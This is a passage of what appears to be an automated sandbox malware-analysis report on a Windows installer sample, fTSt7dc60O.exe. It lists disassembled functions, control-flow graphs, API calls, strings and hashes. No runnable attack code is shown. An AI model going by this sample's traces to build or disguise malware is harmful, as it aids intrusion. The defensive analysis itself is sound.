                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: l]y${$&B
                                                          • API String ID: 590372296-1473421857
                                                          • Opcode ID: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                          • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                          • Opcode Fuzzy Hash: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                          • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                          Function 00405F6A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 419 405f6a-405f75 420 405f77-405f86 419->420 421 405f88-405f9e 419->421 420->421 422 405fa4-405fb1 421->422 423 4061b6-4061bc 421->423 422->423 424 405fb7-405fbe 422->424 425 4061c2-4061cd 423->425 426 405fc3-405fd0 423->426 424->423 428 4061d8-4061d9 425->428 429 4061cf-4061d3 call 405f48 425->429 426->425 427 405fd6-405fe2 426->427 431 4061a3 427->431 432 405fe8-406024 427->432 429->428 433 4061b1-4061b4 431->433 434 4061a5-4061af 431->434 435 406144-406148 432->435 436 40602a-406035 GetVersion 432->436 433->423 434->423 439 40614a-40614e 435->439 440 40617d-406181 435->440 437 406037-40603b 436->437 438 40604f 436->438 437->438 444 40603d-406041 437->444 441 406056-40605d 438->441 445 406150-40615c call 405e8f 439->445 446 40615e-40616b call 405f48 439->446 442 406190-4061a1 lstrlenW 440->442 443 406183-40618b call 405f6a 440->443 448 406062-406064 441->448 449 40605f-406061 441->449 442->423 443->442 444->438 452 406043-406047 444->452 456 406170-406179 445->456 446->456 454 4060a0-4060a3 448->454 455 406066-406083 call 405e15 448->455 449->448 452->438 457 406049-40604d 452->457 460 4060b3-4060b6 454->460 461 4060a5-4060b1 GetSystemDirectoryW 454->461 462 406088-40608c 455->462 456->442 459 40617b 456->459 457->441 463 40613c-406142 call 4061dc 459->463 465 406121-406123 460->465 466 4060b8-4060c6 GetWindowsDirectoryW 460->466 464 406125-406129 461->464 467 406092-40609b call 405f6a 462->467 468 40612b-40612f 462->468 463->442 464->463 464->468 465->464 469 4060c8-4060d2 465->469 466->465 467->464 468->463 472 406131-406137 lstrcatW 468->472 474 4060d4-4060d7 469->474 475 4060ec-406102 SHGetSpecialFolderLocation 469->475 472->463 474->475 476 4060d9-4060e0 474->476 477 406104-40611b SHGetPathFromIDListW CoTaskMemFree 475->477 478 40611d 475->478 480 4060e8-4060ea 476->480 477->464 477->478 478->465 480->464 480->475
                                                          APIs
                                                          • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                          • CoTaskMemFree.OLE32(?), ref: 00406113
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,?,00405229,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 900638850-411306093
                                                          • Opcode ID: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                          • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                          • Opcode Fuzzy Hash: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                          • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                          Function 004057D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 481 4057d0-4057f6 call 405a9b 484 4057f8-40580a DeleteFileW 481->484 485 40580f-405816 481->485 486 40598c-405990 484->486 487 405818-40581a 485->487 488 405829-405839 call 405f48 485->488 489 405820-405823 487->489 490 40593a-40593f 487->490 496 405848-405849 call 4059df 488->496 497 40583b-405846 lstrcatW 488->497 489->488 489->490 490->486 493 405941-405944 490->493 494 405946-40594c 493->494 495 40594e-405956 call 40628b 493->495 494->486 495->486 505 405958-40596c call 405993 call 405788 495->505 499 40584e-405852 496->499 497->499 501 405854-40585c 499->501 502 40585e-405864 lstrcatW 499->502 501->502 504 405869-405885 lstrlenW FindFirstFileW 501->504 502->504 506 40588b-405893 504->506 507 40592f-405933 504->507 521 405984-405987 call 4051f2 505->521 522 40596e-405971 505->522 509 4058b3-4058c7 call 405f48 506->509 510 405895-40589d 506->510 507->490 512 405935 507->512 523 4058c9-4058d1 509->523 524 4058de-4058e9 call 405788 509->524 513 405912-405922 FindNextFileW 510->513 514 40589f-4058a7 510->514 512->490 513->506 520 405928-405929 FindClose 513->520 514->509 517 4058a9-4058b1 514->517 517->509 517->513 520->507 521->486 522->494 526 405973-405982 call 4051f2 call 405de2 522->526 523->513 527 4058d3-4058dc call 4057d0 523->527 532 40590a-40590d call 4051f2 524->532 533 4058eb-4058ee 524->533 526->486 527->513 532->513 536 4058f0-405900 call 4051f2 call 405de2 533->536 537 405902-405908 533->537 536->513 537->513
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 004057F9
                                                          • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 00405841
                                                          • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 00405864
                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 0040586A
                                                          • FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user\AppData\Local\Temp\,774D2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 0040587A
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                          • FindClose.KERNEL32(00000000), ref: 00405929
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057DE
                                                          • "C:\Users\user\Desktop\fTSt7dc60O.exe", xrefs: 004057D9
                                                          • \*.*, xrefs: 0040583B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-1010759551
                                                          • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                          • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                          • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                          • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                          Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                          • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                          • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                          Function 0040628B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,774D2EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,774D2EE0), ref: 00406296
                                                          • FindClose.KERNEL32(00000000), ref: 004062A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: 8WB
                                                          • API String ID: 2295610775-3088156181
                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                          • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                          Function 004062B2 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                          • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                          • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                                          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                          • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9
                                                          Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 004020FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy
                                                          • API String ID: 542301482-2517424574
                                                          • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                          • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                                          • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                          • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                                          Function 00403CC2 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 177 403e73-403e88 175->177 178 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->178 176->175 179 403ce6-403cef 176->179 183 403ec8-403ecd call 4041e6 177->183 184 403e8a-403e8d 177->184 178->177 180 403cf1-403cfe SetWindowPos 179->180 181 403d04-403d07 179->181 180->181 185 403d21-403d27 181->185 186 403d09-403d1b ShowWindow 181->186 196 403ed2-403eed 183->196 188 403ec0-403ec2 184->188 189 403e8f-403e9a call 401389 184->189 191 403d43-403d46 185->191 192 403d29-403d3e DestroyWindow 185->192 186->185 188->183 195 404167 188->195 189->188 211 403e9c-403ebb SendMessageW 189->211 202 403d48-403d54 SetWindowLongW 191->202 203 403d59-403d5f 191->203 200 404144-40414a 192->200 199 404169-404170 195->199 197 403ef6-403efc 196->197 198 403eef-403ef1 call 40140b 196->198 207 403f02-403f0d 197->207 208 404125-40413e DestroyWindow EndDialog 197->208 198->197 200->195 205 40414c-404152 200->205 202->199 209 403e02-403e10 call 404201 203->209 210 403d65-403d76 GetDlgItem 203->210 205->195 212 404154-40415d ShowWindow 205->212 207->208 213 403f13-403f60 call 405f6a call 40419a * 3 GetDlgItem 207->213 208->200 209->199 214 403d95-403d98 210->214 215 403d78-403d8f SendMessageW IsWindowEnabled 210->215 211->199 212->195 244 403f62-403f67 213->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 213->245 218 403d9a-403d9b 214->218 219 403d9d-403da0 214->219 215->195 215->214 222 403dcb-403dd0 call 404173 218->222 223 403da2-403da8 219->223 224 403dae-403db3 219->224 222->209 226 403de9-403dfc SendMessageW 223->226 229 403daa-403dac 223->229 225 403db5-403dbb 224->225 224->226 230 403dd2-403ddb call 40140b 225->230 231 403dbd-403dc3 call 40140b 225->231 226->209 229->222 230->209 241 403ddd-403de7 230->241 240 403dc9 231->240 240->222 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f48 lstrlenW call 405f6a SetWindowTextW call 401389 251->253 252->253 253->196 262 40403a-40403c 253->262 262->196 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->200 267 40407f-4040ac CreateDialogParamW 264->267 265->195 266 404054-40405a 265->266 266->196 268 404060 266->268 267->200 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->195 269->195 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->200
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: l]y$&B
                                                          • API String ID: 3282139019-246387400
                                                          • Opcode ID: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                          • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                          • Opcode Fuzzy Hash: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                          • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                          Function 0040391F Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 277 40391f-403937 call 4062b2 280 403939-403949 call 405e8f 277->280 281 40394b-403982 call 405e15 277->281 290 4039a5-4039ce call 403bf5 call 405a9b 280->290 286 403984-403995 call 405e15 281->286 287 40399a-4039a0 lstrcatW 281->287 286->287 287->290 295 403a60-403a68 call 405a9b 290->295 296 4039d4-4039d9 290->296 302 403a76-403a9b LoadImageW 295->302 303 403a6a-403a71 call 405f6a 295->303 296->295 297 4039df-403a07 call 405e15 296->297 297->295 304 403a09-403a0d 297->304 306 403b1c-403b24 call 40140b 302->306 307 403a9d-403acd RegisterClassW 302->307 303->302 308 403a1f-403a2b lstrlenW 304->308 309 403a0f-403a1c call 4059c0 304->309 318 403b26-403b29 306->318 319 403b2e-403b39 call 403bf5 306->319 310 403ad3-403b17 SystemParametersInfoW CreateWindowExW 307->310 311 403beb 307->311 316 403a53-403a5b call 405993 call 405f48 308->316 317 403a2d-403a3b lstrcmpiW 308->317 309->308 310->306 314 403bed-403bf4 311->314 316->295 317->316 322 403a3d-403a47 GetFileAttributesW 317->322 318->314 330 403bc2-403bc3 call 4052c5 319->330 331 403b3f-403b5c ShowWindow LoadLibraryW 319->331 325 403a49-403a4b 322->325 326 403a4d-403a4e call 4059df 322->326 325->316 325->326 326->316 335 403bc8-403bca 330->335 332 403b65-403b77 GetClassInfoW 331->332 333 403b5e-403b63 LoadLibraryW 331->333 336 403b79-403b89 GetClassInfoW RegisterClassW 332->336 337 403b8f-403bb2 DialogBoxParamW call 40140b 332->337 333->332 338 403be4-403be6 call 40140b 335->338 339 403bcc-403bd2 335->339 336->337 343 403bb7-403bc0 call 40386f 337->343 338->311 339->318 341 403bd8-403bdf call 40140b 339->341 341->318 343->314
                                                          APIs
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,774D3420,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 004039A0
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
